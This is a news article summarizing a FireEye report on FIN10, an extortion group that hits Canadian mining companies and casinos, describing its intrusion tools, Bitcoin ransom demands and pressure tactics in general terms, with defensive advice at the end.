A group of financially motivated hackers is targeting networks and systems of North American companies, a new report found.
Part of the attack has the bad guys threatening to leak the stolen information which could then cripple the company by disrupting their networks if they don’t pay a hefty ransom.
The group, called FIN10 by FireEye researchers, gains access to the target companies’ systems through spear-phishing, then uses publicly available software, scripts and techniques to gain a foothold into victims’ networks.
They use Meterpreter or the SplinterRAT to establish the initial foothold within victim environments (and later a permanent backdoor), then custom PowerShell-based utilities, the pen-testing tool PowerShell Empire, and scheduled tasks to achieve persistence.
The group leverages Windows Remote Desktop Protocol (RDP) and single-factor protected VPN to access various systems within the environment. They also deploy destructive batch scripts intended to delete critical system files and shutdown network systems, in order to disrupt the normal operations of those systems.
“In all but one targeted intrusion we have attributed to FIN10, the attacker(s) demanded a variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages,” the researchers say. They requested sum varies between 100 to 500 Bitcoin.
If the ransom isn’t paid, they publish the stolen data on Pastebin-type sites. The researchers do not mention if any of the companies refused to pay and ended up having their systems and networks disrupted.
For the time being, the group seems to have concentrated on hitting companies in North America, predominately in Canada. They’ve also concentrated on two types of businesses: Mining companies and casinos, the researchers said.
FIN10 sends the extortion emails to staff and board members of the victim organizations, and are also known to contact bloggers and local journalists to inform them about the breach, likely in an attempt to pressure affected organizations into paying the ransom.
Finally, even though they sign their emails with monikers used by Russian and Serbian hackers (“Angels_Of_Truth,” “Tesla Team,” Anonymous Threat Agent”), the quality of the group’s English, the low quality of their Russian, and inconsistencies in tradecraft all point away from these particular individuals or groups.
Companies receiving a ransom demand should quickly move to confirm the breach has actually happened, determine the scope of the breach, to contain the attack, to boot the attackers from their networks, and make sure they can’t come back.
Click here to register for the report.